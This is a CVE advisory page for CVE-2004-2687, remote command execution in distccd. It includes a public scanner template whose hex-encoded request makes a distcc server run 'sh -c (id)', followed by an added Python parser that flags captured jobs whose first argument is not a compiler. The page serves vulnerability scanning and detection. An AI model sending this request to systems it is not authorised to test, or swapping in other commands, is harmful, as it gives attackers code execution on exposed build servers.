CVE-2004-2687: Distccd v1 - Remote Code Execution

Date: 2025-08-01 | Affected software: Distccd | PoC: Public

Vulnerability Description

distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.

PoC Code [Public]

id: CVE-2004-2687

info:
  name: Distccd v1 - Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.
  reference:
    - http://distcc.samba.org/security.html
    - http://lists.samba.org/archive/distcc/2004q3/002550.html
    - http://lists.samba.org/archive/distcc/2004q3/002562.html
    - https://github.com/crypticdante/distccd_rce_CVE-2004-2687
    - https://github.com/gwyomarch/Lame-HTB-Writeup-FR
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C
    cvss-score: 9.3
    cve-id: CVE-2004-2687
    cwe-id: CWE-16
    epss-score: 0.8951
    epss-percentile: 0.99533
    cpe: cpe:2.3:a:apple:xcode:1.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2004,network,rce,distccd

tcp:
  - inputs:
      - data: 444953543030303030303031
        type: hex
      - data: 41524743303030303030303841524756303030303030303273684152475630303030303030322d634152475630303030303030637368202d6320272869642927415247563030303030303031234152475630303030303030322d634152475630303030303030366d61696e2e634152475630303030303030322d6f4152475630303030303030366d61696e2e6f444f5449303030303030303141
        type: hex
    host:
      - "{{Hostname}}"
    port: 3632

    matchers:
      - type: regex
        part: raw
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"
# digest: 490a00463044022020157c511f2e2882fb82a0c915d755237a75951de03a452ad6cf55fe0efad69802201b59bd257ce34d6bb99a411f43b1913f30a1e3ab8acb35159cd5d3660bf99e3a:922c64590222798bb761d5b6d8e72950
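
Added example (not part of the original template or of the distcc project): a Python parser for the request stream formed by the template's two hex inputs, for use on captured port 3632 traffic to flag jobs whose argv[0] is not a compiler. The token layout (4-letter name plus 8 hex digits), the COMPILERS allowlist, the benign sample and the function names are assumptions of this example.

```python
import os
import string

# Assumed token layout (distcc protocol 1): 4 ASCII letters + 8 hex digits.
# For ARGV the number is the byte length of the argument that follows.
COMPILERS = {"cc", "c++", "gcc", "g++", "clang", "clang++"}  # assumed allowlist

# The two hex inputs from the template above, concatenated as sent on the wire.
TEMPLATE_REQUEST = bytes.fromhex(
    "444953543030303030303031"
    "41524743303030303030303841524756303030303030303273684152475630303030303030322d634152475630303030303030637368202d6320272869642927415247563030303030303031234152475630303030303030322d634152475630303030303030366d61696e2e634152475630303030303030322d6f4152475630303030303030366d61696e2e6f444f5449303030303030303141"
)
# Constructed benign compile job for comparison.
BENIGN_REQUEST = (b"DIST00000001ARGC00000005ARGV00000003gccARGV00000002-c"
                  b"ARGV00000006main.cARGV00000002-oARGV00000006main.o"
                  b"DOTI00000001A")


def parse_request(data):
    """Return (protocol_version, argv); raise ValueError on malformed input."""
    pos = 0

    def token(name):
        nonlocal pos
        head = data[pos:pos + 12]
        digits = head[4:].decode("ascii", "replace")
        if len(head) != 12 or head[:4] != name or set(digits) - set(string.hexdigits):
            raise ValueError(f"bad {name.decode()} token at offset {pos}")
        pos += 12
        return int(digits, 16)

    version, argc = token(b"DIST"), token(b"ARGC")
    argv = []
    for _ in range(argc):
        length = token(b"ARGV")
        if pos + length > len(data):
            raise ValueError("ARGV length runs past end of capture")
        argv.append(data[pos:pos + length].decode("latin-1"))
        pos += length
    return version, argv


def findings(data):
    """List reasons a request looks like command execution, not a compile job."""
    _version, argv = parse_request(data)
    if not argv:
        return ["request carries no arguments"]
    if os.path.basename(argv[0]) not in COMPILERS:
        return [f"argv[0] {argv[0]!r} is not an allowlisted compiler"]
    return []
```

Decoded this way, the template's request is a job whose argv[0] is `sh`, which is the condition worth alerting on; the allowlist needs extending for cross-compiler or versioned binary names in a real build farm.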
